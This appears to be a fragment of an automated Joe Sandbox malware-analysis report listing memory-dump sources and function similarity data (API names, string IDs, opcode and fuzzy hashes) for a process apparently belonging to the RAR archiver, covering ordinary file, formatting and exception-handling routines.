                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: swprintf
                                                                                                                                                                                                                                                                    • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                                                                                                                    • API String ID: 233258989-622958660
                                                                                                                                                                                                                                                                    • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                                                    • Instruction ID: 82ad8eb166f5d2760bb7ad6718ad28f677deff7a8f063566e581e0ad36dac15c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D45107F3E386448AE3648F1CE841BA926E1F764F91F545A29F94AD3B44CA3DDA44C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: wcschr
                                                                                                                                                                                                                                                                    • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                                                                    • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                                                                    • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                                                    • Instruction ID: 6dbbb26446379dfd1b852c714891ede3eeb522df3f5ebcb509b6eab97226511e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D741AE13D0C5C3C0FA359B60A15267D62F1EF11FC4F5851B9EA5D862D6EE2EEC988321
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00007FF695CF359E
                                                                                                                                                                                                                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CF35E6
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF695CF305D,?,?,?,?,?,?,?,?,00007FF695D04126,?,?,?,?,00000800), ref: 00007FF695CF30F0
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF695D04126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF695CF3119
                                                                                                                                                                                                                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CF3651
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: %u.%03u
                                                                                                                                                                                                                                                                    • API String ID: 2814246642-1114938957
                                                                                                                                                                                                                                                                    • Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                                                                                                                    • Instruction ID: cff303ce534d97a5588f056c0bd59be04c7825aaf5f7ff296902ea65cfcfe1f2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB313B6261858192E7249B24E5112BA67A0FB84FB4F501336ED7E877E1DF3DD94AC700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                                    • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                                                    • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                                                    • Instruction ID: 974b2713bb9aee270d596253865a33f9e74b358e802960c1b0f3b25df7b485d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4641C322B19A41C2EB208F25E8443BAB7A1FB88B84F415231EE4DC7794EF3CD905C754
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                                                    • Instruction ID: 231420ea2577cc2a75007ea2550f6566768949fd84484f8a89c07a9857e9b3c6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA212B7A60864186E630DB15E04026EB7A1FB88FA5F002375DE9D47B95CF3DE84BCB45
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: wcschr$swprintf
                                                                                                                                                                                                                                                                    • String ID: %c:\
                                                                                                                                                                                                                                                                    • API String ID: 1303626722-3142399695
                                                                                                                                                                                                                                                                    • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                                                                    • Instruction ID: c32cf754ba69282437a5846e8193c7ad8985abb3496a51fe7fbd4a4e11ab39d6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE116312A4874181EE346F21950147DA3B0EF45FD0B58A6B6DF6E837E6DF3CF8698204
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                                                                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                                                                                                                                                                    • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                                                                    • Instruction ID: ae2eb6ba33c7d7879fd77b1d0810fc89ce0697b69d6ea72327c7f8ac83103569
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95110632B1564186F7248F21E4453B933E2EBC4F48F089139CA4D4B299CF3D985AC784
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 904936192-0
                                                                                                                                                                                                                                                                    • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                                                    • Instruction ID: 4171aae0aedbb2dc4d4b709e2995d321827510c3faccdb1db3b8a5ea847f5f8d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C51D162A19A8181EB24CF25D4503AC73A1FBC4F94F049231DE9EC77A9DF79D91AC304
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF695CEF6FC,00000000,?,?,?,?,00007FF695CF097D), ref: 00007FF695CF38CD
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,?,?,?,00007FF695CEF6FC,00000000,?,?,?,?,00007FF695CF097D,?,?,00000000), ref: 00007FF695CF391F
                                                                                                                                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00007FF695CEF6FC,00000000,?,?,?,?,00007FF695CF097D,?,?,00000000), ref: 00007FF695CF399B
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00007FF695CEF6FC,00000000,?,?,?,?,00007FF695CF097D,?,?,00000000), ref: 00007FF695CF39A6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2287278272-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                                                                                                                                                                                                                                    • Instruction ID: 1665c1f9e61186b08caf2ebfa67900e5599847b6fda6adb1691ed7510eceb9d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C41D223B0C641A2FA708B11A41077A66F0FB81FA4F105275EE9D877D4DE7CD9498B00
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 932687459-0
                                                                                                                                                                                                                                                                    • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                                                    • Instruction ID: 0514284321ef90d6227e7afa3b8267e25500ce96a339a73ecbc100cce1d25687
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A419462A0DAC285EB71DA21D0503BD63D0EF50F84F1856B2DB4D86699DF6CEC4A8398
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
